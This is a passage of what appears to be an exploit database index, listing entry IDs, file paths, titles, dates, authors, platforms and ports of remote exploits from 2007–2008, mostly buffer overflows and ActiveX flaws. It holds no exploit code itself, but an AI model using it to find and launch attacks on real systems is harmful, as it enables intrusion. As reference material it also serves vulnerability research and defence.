+4280,exploits/windows/remote/4280.pl,"Savant Web Server 3.1 - GET Universal Remote Overflow",2007-08-12,"Jacopo Cervini",remote,windows,80 +4283,exploits/windows/remote/4283.pl,"Racer 0.5.3 Beta 5 - Remote Buffer Overflow",2007-08-13,n00b,remote,windows,26000 +4287,exploits/windows/remote/4287.py,"Surgemail 38k - 'Search' Remote Buffer Overflow",2007-08-14,"Joey Mengele",remote,windows,143 +4290,exploits/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,remote,windows, +4292,exploits/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,remote,windows, +4299,exploits/windows/remote/4299.html,"eCentrex VOIP Client module - 'uacomx.ocx 2.0.1' Remote Buffer Overflow",2007-08-21,rgod,remote,windows, +4301,exploits/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,remote,windows,25 +4312,exploits/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow",2007-08-24,netris,remote,linux,21 +4315,exploits/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",remote,linux,389 +4316,exploits/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,remote,windows,25 +4321,exploits/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,remote,linux, +4322,exploits/windows/remote/4322.html,"NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Command Execution",2007-08-28,shinnai,remote,windows, +4323,exploits/windows/remote/4323.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'SaveXMLFile()' Insecure Method",2007-08-27,shinnai,remote,windows, +4324,exploits/windows/remote/4324.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'DeleteXMLFile()' Insecure Method",2007-08-27,shinnai,remote,windows, +4328,exploits/windows/remote/4328.html,"Postcast Server Pro 3.0.61 / Quiksoft EasyMail - 'emsmtp.dll 6.0.1' Remote Buffer Overflow",2007-08-28,rgod,remote,windows, +4334,exploits/windows/remote/4334.txt,"Microsoft MSN Messenger 7.x/8.0? - Video Remote Heap Overflow",2007-08-29,wushi,remote,windows, +4348,exploits/windows/remote/4348.c,"PPStream - 'PowerPlayer.dll 2.0.1.3829' ActiveX Remote Overflow",2007-08-31,dummy,remote,windows, +4351,exploits/windows/remote/4351.html,"Yahoo! Messenger - 'YVerInfo.dll 2007.8.27.1' ActiveX Buffer Overflow",2007-09-01,minhbq,remote,windows, +4357,exploits/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote Registry Key Manipulation",2007-09-03,rgod,remote,windows, +4360,exploits/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)",2007-09-03,"Patrick Webster",remote,windows, +4362,exploits/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal",2007-09-04,Katatafish,remote,linux, +4366,exploits/windows/remote/4366.html,"GlobalLink 2.7.0.8 - 'glItemCom.dll SetInfo()' Heap Overflow",2007-09-05,void,remote,windows, +4367,exploits/windows/remote/4367.c,"Trend Micro ServerProtect - 'eng50.dll' Remote Stack Overflow",2007-09-06,devcode,remote,windows, +4372,exploits/windows/remote/4372.html,"GlobalLink 2.7.0.8 - 'glitemflat.dll SetClientInfo()' Heap Overflow",2007-09-07,void,remote,windows, +4388,exploits/windows/remote/4388.html,"Ultra Crypto Component - 'CryptoX.dll 2.0 SaveToFile()' Insecure Method",2007-09-10,shinnai,remote,windows, +4389,exploits/windows/remote/4389.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' Remote Buffer Overflow",2007-09-10,shinnai,remote,windows, +4391,exploits/multiple/remote/4391.c,"Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Execution",2007-09-10,"Mattias Bengtsson",remote,multiple, +4393,exploits/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - 'PDWizard.ocx' Remote Command Execution",2007-09-11,shinnai,remote,windows, +4394,exploits/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - 'VBTOVSI.dll 1.0.0.0' File Overwrite",2007-09-11,shinnai,remote,windows, +4398,exploits/windows/remote/4398.html,"Microsoft SQL Server - Distributed Management Objects Buffer Overflow",2007-09-12,96sysim,remote,windows, +4399,exploits/multiple/remote/4399.html,"Apple QuickTime (Multiple Browsers) - Command Execution (PoC)",2007-09-12,pdp,remote,multiple, +4420,exploits/windows/remote/4420.html,"MW6 Technologies QRCode ActiveX 3.0 - Remote File Overwrite",2007-09-18,shinnai,remote,windows, +4424,exploits/windows/remote/4424.html,"Apple QuickTime /w IE .qtl Version XAS - Remote (PoC)",2007-09-18,"Aviv Raff",remote,windows, +4427,exploits/windows/remote/4427.html,"jetAudio 7.x - ActiveX 'DownloadFromMusicStore()' Code Execution",2007-09-19,h07,remote,windows, +4428,exploits/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,remote,windows, +4429,exploits/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - 'SEARCH' Authenticated Overflow",2007-09-19,void,remote,windows,143 +4437,exploits/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execution",2007-09-20,Andi,remote,linux,80 +4438,exploits/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x - Remote Heap Overflow",2007-09-21,axis,remote,windows,25 +4445,exploits/windows/remote/4445.html,"EasyMail MessagePrinter Object - 'emprint.dll 6.0.1.0' Remote Buffer Overflow",2007-09-23,rgod,remote,windows, +4450,exploits/windows/remote/4450.py,"Xitami Web Server 2.5 - 'If-Modified-Since' Remote Buffer Overflow",2007-09-24,h07,remote,windows,80 +4452,exploits/windows/remote/4452.html,"Ask.com/AskJeeves Toolbar Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow",2007-09-24,"Joey Mengele",remote,windows, +4453,exploits/windows/remote/4453.html,"EB Design Pty Ltd - 'EBCRYPT.dll 2.0' Multiple Remote Vulnerabilities",2007-09-24,shinnai,remote,windows, +4455,exploits/windows/remote/4455.pl,"Motorola Timbuktu Pro 8.6.5 - File Deletion/Creation",2008-03-11,titon,remote,windows, +4468,exploits/windows/remote/4468.html,"Tor < 0.1.2.16 - ControlPort Remote Rewrite",2007-09-29,elgCrew,remote,windows, +4478,exploits/linux/remote/4478.c,"smbftpd 0.96 - SMBDirList-function Remote Format String",2007-10-01,"Jerry Illikainen",remote,linux,21 +4484,exploits/windows/remote/4484.pl,"FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow",2007-10-04,weak,remote,windows, +4487,exploits/windows/remote/4487.html,"Pegasus Imaging ThumbnailXpress 1.0 - Arbitrary File Deletion",2007-10-05,shinnai,remote,windows, +4488,exploits/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Arbitrary File Overwrite",2007-10-05,shinnai,remote,windows, +4506,exploits/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution",2007-10-09,shinnai,remote,windows, +4514,exploits/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,remote,linux, +4522,exploits/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak",2007-10-11,"Niacin & Dre",remote,hardware, +4526,exploits/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method",2007-10-12,Katatafish,remote,windows, +4530,exploits/multiple/remote/4530.pl,"Apache Tomcat - 'WebDAV' Remote File Disclosure",2007-10-14,eliteboy,remote,multiple, +4533,exploits/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,remote,linux,4501 +4534,exploits/linux/remote/4534.c,"eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow",2007-10-15,mu-b,remote,linux,143 +4537,exploits/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 - Remote Buffer Overflow",2005-05-03,greuff,remote,linux, +4541,exploits/linux/remote/4541.c,"Half-Life Server 3.1.1.0 - Remote Buffer Overflow",2005-10-16,greuff,remote,linux,27015 +4542,exploits/linux/remote/4542.py,"Boa 0.93.15 - HTTP Basic Authentication Bypass",2007-10-16,ikki,remote,linux, +4552,exploits/linux/remote/4552.pl,"Apache Tomcat - WebDAV SSL Remote File Disclosure",2007-10-21,h3rcul3s,remote,linux, +4556,exploits/multiple/remote/4556.txt,"Litespeed Web Server 3.2.3 - Source Code Disclosure",2007-10-22,Tr3mbl3r,remote,multiple, +4566,exploits/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT - Remote Overflow (Metasploit)",2007-10-24,ri0t,remote,windows,10616 +4567,exploits/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure",2007-10-24,kingcope,remote,multiple, +4573,exploits/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow",2007-10-27,muts,remote,windows,1581 +4574,exploits/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 - IMAP4 Server LSUB Command",2007-10-27,FistFuXXer,remote,windows,143 +4579,exploits/windows/remote/4579.html,"GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow",2007-10-29,rgod,remote,windows, +4594,exploits/windows/remote/4594.html,"SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Command Execution",2007-11-01,krafty,remote,windows, +4598,exploits/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 - Insecure Method",2007-11-02,shinnai,remote,windows, +4616,exploits/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,remote,windows, +4651,exploits/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 (Windows Vista/XP) - RSTP Response Code Execution",2007-11-24,InTeL,remote,windows, +4657,exploits/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal",2007-11-26,muts,remote,windows, +4663,exploits/windows/remote/4663.html,"BitDefender Online Scanner 8 - ActiveX Heap Overflow",2007-11-27,Nphinity,remote,windows, +4664,exploits/windows/remote/4664.txt,"Apple QuickTime 7.2/7.3 - RSTP Response Universal",2007-11-27,"YAG KOHHA",remote,windows, +4673,exploits/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal",2007-11-29,"Subreption LLC.",remote,multiple, +4699,exploits/windows/remote/4699.txt,"firefly media server (mt-daapd) 2.4.1 / svn 1699 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",remote,windows, +4700,exploits/windows/remote/4700.txt,"Simple HTTPd 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",remote,windows, +4713,exploits/windows/remote/4713.txt,"barracudadrive 3.7.2 - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",remote,windows, +4715,exploits/windows/remote/4715.txt,"BadBlue 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",remote,windows, +4720,exploits/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,remote,windows, +4724,exploits/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow",2007-12-12,muts,remote,windows,80 +4744,exploits/hardware/remote/4744.txt,"rooter VDSL Device - Goahead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware, +4745,exploits/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)",2007-12-18,axis,remote,windows, +4746,exploits/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,remote,windows, +4747,exploits/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - 'ulang' Remote Command Execution",2007-12-18,rgod,remote,windows, +4754,exploits/win_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",remote,win_x86,3128 +4760,exploits/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)",2007-12-21,"Andres Tarasco",remote,windows, +4761,exploits/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,remote,multiple,25 +4784,exploits/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",remote,windows,80 +4797,exploits/hardware/remote/4797.pl,"March Networks DVR 3204 - Logfile Information Disclosure",2007-12-27,"Alex Hernandez",remote,hardware, +4806,exploits/windows/remote/4806.html,"Persits Software XUpload Control - 'AddFolder()' Remote Buffer Overflow",2007-12-28,Elazar,remote,windows, +4818,exploits/windows/remote/4818.html,"IBM Domino Web Access 7.0 Upload Module - 'inotes6.dll' Remote Buffer Overflow",2007-12-30,Elazar,remote,windows, +4819,exploits/windows/remote/4819.html,"Macrovision Installshield - 'isusweb.dll' Overwrite (SEH)",2007-12-30,Elazar,remote,windows, +4820,exploits/windows/remote/4820.html,"IBM Domino Web Access Upload Module - 'dwa7w.dll' Remote Buffer Overflow",2007-12-30,Elazar,remote,windows, +4825,exploits/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow",2007-12-31,Elazar,remote,windows, +4862,exploits/linux/remote/4862.py,"ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow",2008-01-07,"Thomas Pollet",remote,linux, +4866,exploits/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow",2008-01-08,ryujin,remote,windows, +4868,exploits/windows/remote/4868.html,"Move Networks Quantum Streaming Player - Remote Overflow (SEH)",2008-01-08,Elazar,remote,windows, +4869,exploits/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method",2008-01-08,Elazar,remote,windows, +4873,exploits/windows/remote/4873.html,"Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution",2008-01-09,shinnai,remote,windows, +4874,exploits/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method",2008-01-09,shinnai,remote,windows, +4877,exploits/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution",2008-01-09,"Luigi Auriemma",remote,multiple,7210 +4894,exploits/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Remote Buffer Overflow",2008-01-11,Elazar,remote,windows, +4903,exploits/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module 'PdvrAtl.DLL 1.0.1.25' - Remote Buffer Overflow",2008-01-13,rgod,remote,windows, +4906,exploits/windows/remote/4906.txt,"QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow (PoC)",2008-01-14,"Luigi Auriemma",remote,windows, +4909,exploits/windows/remote/4909.html,"Macrovision FlexNet DownloadManager - Insecure Methods",2008-01-14,Elazar,remote,windows, +4913,exploits/windows/remote/4913.html,"Macrovision FlexNet - 'isusweb.dll' DownloadAndExecute Method",2008-01-15,Elazar,remote,windows, +4918,exploits/windows/remote/4918.html,"RTS Sentry Digital Surveillance - 'CamPanel.dll 2.1.0.2' Remote Buffer Overflow",2008-01-16,rgod,remote,windows, +4923,exploits/windows/remote/4923.txt,"Miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",remote,windows, +4932,exploits/windows/remote/4932.html,"Digital Data Communications - 'RtspVaPgCtrl' Class Remote Buffer Overflow",2008-01-17,rgod,remote,windows, +4934,exploits/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2)",2008-01-18,"Marcin Kozlowski",remote,windows, +4941,exploits/hardware/remote/4941.txt,"Belkin F5D9230-4 Wireless G Plus MIMO Router - Authentication Bypass",2008-01-20,DarkFig,remote,hardware, +4946,exploits/windows/remote/4946.html,"Toshiba Surveillance - 'MeIpCamX.dll 1.0.0.4' Remote Buffer Overflow",2008-01-20,rgod,remote,windows, +4947,exploits/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String",2008-01-21,hempel,remote,linux, +4948,exploits/windows/remote/4948.txt,"Microsoft Windows RSH daemon 1.8 - Remote Buffer Overflow",2008-01-21,prdelka,remote,windows, +4949,exploits/windows/remote/4949.txt,"Citadel SMTP 7.10 - Remote Overflow",2008-01-21,prdelka,remote,windows,25 +4959,exploits/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Remote Buffer Overflow",2008-01-22,Elazar,remote,windows, +4967,exploits/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,remote,windows, +4974,exploits/windows/remote/4974.html,"Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution",2008-01-23,h07,remote,windows, +4979,exploits/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Remote Buffer Overflow",2008-01-24,Elazar,remote,windows, +4981,exploits/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)",2008-01-24,rgod,remote,windows, +4982,exploits/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,remote,windows, +4986,exploits/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method",2008-01-25,plan-s,remote,windows, +4987,exploits/windows/remote/4987.html,"Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow",2008-01-25,Elazar,remote,windows, +4999,exploits/windows/remote/4999.html,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method",2008-01-28,darkl0rd,remote,windows, +5005,exploits/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method",2008-01-29,darkl0rd,remote,windows, +5025,exploits/windows/remote/5025.html,"MySpace Uploader - 'MySpaceUploader.ocx 1.0.0.4' Remote Buffer Overflow",2008-01-31,Elazar,remote,windows, +5028,exploits/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 - 'ChilkatCert.dll' Insecure Method",2008-01-31,darkl0rd,remote,windows, +5045,exploits/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' ActiveX Buffer Overflow",2008-02-03,plan-s,remote,windows, +5046,exploits/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (1)",2008-02-03,anonymous,remote,windows, +5048,exploits/windows/remote/5048.html,"Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (2)",2008-02-03,exceed,remote,windows, +5049,exploits/windows/remote/5049.html,"FaceBook PhotoUploader - 'ImageUploader4.ocx 4.5.57.0' Remote Buffer Overflow",2008-02-03,Elazar,remote,windows, +5051,exploits/windows/remote/5051.html,"Yahoo! Music JukeBox 2.2 - 'AddButton()' ActiveX Remote Buffer Overflow",2008-02-03,Elazar,remote,windows, +5052,exploits/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - 'AddBitmap()' ActiveX Buffer Overflow",2008-02-03,Elazar,remote,windows, +5069,exploits/windows/remote/5069.pl,"dBpowerAMP Audio Player 2 - '.m3u' Remote Buffer Overflow",2008-02-06,securfrog,remote,windows, +5078,exploits/windows/remote/5078.html,"Backup Exec System Recovery Manager 7.0.1 - Arbitrary File Upload",2008-02-07,titon,remote,windows, +5079,exploits/win_x86/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,remote,win_x86,515 +5087,exploits/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,remote,windows, +5100,exploits/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab' 1.0.0.38 ActiveX Buffer Overflow",2008-02-10,Elazar,remote,windows, +5102,exploits/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",remote,windows, +5106,exploits/windows/remote/5106.html,"Citrix Presentation Server Client - 'WFICA.OCX' ActiveX Heap Buffer Overflow",2008-02-12,Elazar,remote,windows, +5111,exploits/windows/remote/5111.html,"IBM Domino Web Access Upload Module - Overwrite (SEH)",2008-02-13,Elazar,remote,windows, +5113,exploits/hardware/remote/5113.txt,"Philips VOIP841 Firmware 1.0.4.800 - Multiple Vulnerabilities",2008-02-14,ikki,remote,hardware, +5150,exploits/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,remote,hardware, +5153,exploits/windows/remote/5153.asp,"Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow",2008-02-19,luoluo,remote,windows, +5188,exploits/windows/remote/5188.html,"Rising AntiVirus Online Scanner - Insecure Method Flaw",2008-02-25,"John Smith",remote,windows, +5190,exploits/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control - Remote Buffer Overflow",2008-02-26,Elazar,remote,windows, +5193,exploits/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - 'VAPGDecoder.dll 1.7.0.5' Remote Buffer Overflow",2008-02-26,rgod,remote,windows, +5205,exploits/windows/remote/5205.html,"Symantec BackupExec Calendar Control - 'PVCalendar.ocx' Remote Buffer Overflow",2008-02-29,Elazar,remote,windows, +5212,exploits/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,remote,windows, +5213,exploits/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution",2008-03-04,"Luigi Auriemma",remote,windows, +5215,exploits/multiple/remote/5215.txt,"Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal",2008-03-06,DSecRG,remote,multiple, +5224,exploits/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Code Execution",2008-03-09,DarkFig,remote,linux, +5228,exploits/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",remote,windows, +5230,exploits/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",remote,windows, +5238,exploits/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection",2008-03-11,"Core Security",remote,windows, +5248,exploits/windows/remote/5248.py,"Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,remote,windows,143 +5249,exploits/windows/remote/5249.pl,"MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow",2008-03-14,haluznik,remote,windows, +5257,exploits/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 < 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,remote,multiple, +5259,exploits/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal",2008-03-14,ryujin,remote,windows,143 +5264,exploits/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow",2008-03-16,h07,remote,windows, +5269,exploits/windows/remote/5269.txt,"MG-SOFT Net Inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",remote,windows, +5282,exploits/solaris/remote/5282.txt,"Sun Solaris 10 - 'rpc.ypupdated' Remote Code Execution",2008-03-20,kingcope,remote,solaris, +5283,exploits/linux/remote/5283.txt,"CenterIM 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",remote,linux, +5289,exploits/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution",2008-03-21,"Pranav Joshi",remote,hardware, +5313,exploits/hardware/remote/5313.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass (1)",2008-03-26,meathive,remote,hardware, +5314,exploits/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,remote,windows,69 +5315,exploits/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)",2008-03-26,muts,remote,windows,69 +5330,exploits/win_x86/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,remote,win_x86,80 +5332,exploits/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,remote,windows, +5338,exploits/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,remote,windows, +5342,exploits/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Unauthenticated Overflow (SEH)",2008-04-02,muts,remote,windows,7510 +5366,exploits/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)",2008-04-04,I)ruid,remote,solaris, +5386,exploits/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow",2008-04-06,"INetCop Security",remote,linux,80 +5395,exploits/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,remote,windows, +5397,exploits/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",remote,windows, +5398,exploits/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",remote,windows, +5416,exploits/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method",2008-04-09,shinnai,remote,windows, +5430,exploits/multiple/remote/5430.txt,"HP OpenView Network Node Manager 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",remote,multiple, +5445,exploits/windows/remote/5445.cpp,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'ovalarmsrv.exe' Remote Overflow",2008-04-14,Heretic2,remote,windows,2954 +5451,exploits/windows/remote/5451.py,"BigAnt Server 2.2 - Unauthenticated Remote Overflow (SEH)",2008-04-15,ryujin,remote,windows,6080 +5461,exploits/windows/remote/5461.rb,"Intel Centrino ipw2200BG - Wireless Driver Remote Buffer Overflow (Metasploit)",2008-04-17,oveRet,remote,windows, +5489,exploits/windows/remote/5489.html,"Zune Software - ActiveX Arbitrary File Overwrite",2008-04-23,"ilion security",remote,windows, +5496,exploits/windows/remote/5496.html,"Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods",2008-04-25,callAX,remote,windows, +5511,exploits/windows/remote/5511.html,"HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method (PoC)",2008-04-27,callAX,remote,windows, +5519,exploits/windows/remote/5519.c,"VideoLAN VLC Media Player 0.8.6d - 'httpd_FileCallBack' Remote Format String",2008-04-28,EpiBite,remote,windows, +5530,exploits/windows/remote/5530.html,"Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Remote Buffer Overflow",2008-05-02,lhoang8500,remote,windows, +5534,exploits/multiple/remote/5534.txt,"HLDS WebMod 0.48 - Multiple Remote Vulnerabilities",2008-05-03,"Luigi Auriemma",remote,multiple, +5536,exploits/windows/remote/5536.php,"HLDS WebMod 0.48 - 'rconpass' Remote Heap Overflow",2008-05-03,SkOd,remote,windows, +5563,exploits/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow",2008-05-08,tixxDZ,remote,windows,69 +5612,exploits/windows/remote/5612.html,"idautomation bar code - ActiveX Multiple Vulnerabilities",2008-05-14,shinnai,remote,windows, +5619,exploits/windows/remote/5619.html,"Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting (PoC)",2008-05-14,"Aviv Raff",remote,windows, +5622,exploits/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Perl)",2008-05-15,"Markus Mueller",remote,linux,22 +5632,exploits/linux/remote/5632.rb,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)",2008-05-16,L4teral,remote,linux,22 +5681,exploits/windows/remote/5681.html,"Creative Software AutoUpdate Engine - ActiveX Stack Overflow",2008-05-27,BitKrush,remote,windows, +5694,exploits/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow",2008-05-29,Heretic2,remote,windows,623 +5695,exploits/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow",2008-05-29,Heretic2,remote,windows,8800 +5720,exploits/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Python)",2008-06-01,"WarCat team",remote,linux,22 +5732,exploits/windows/remote/5732.html,"C6 Messenger - ActiveX Remote Download and Execute",2008-06-03,Nine:Situations:Group,remote,windows, +5738,exploits/windows/remote/5738.rb,"HP StorageWorks - NSI Double Take Remote Overflow (Metasploit)",2008-06-04,ri0t,remote,windows,1100 +5741,exploits/windows/remote/5741.html,"Akamai 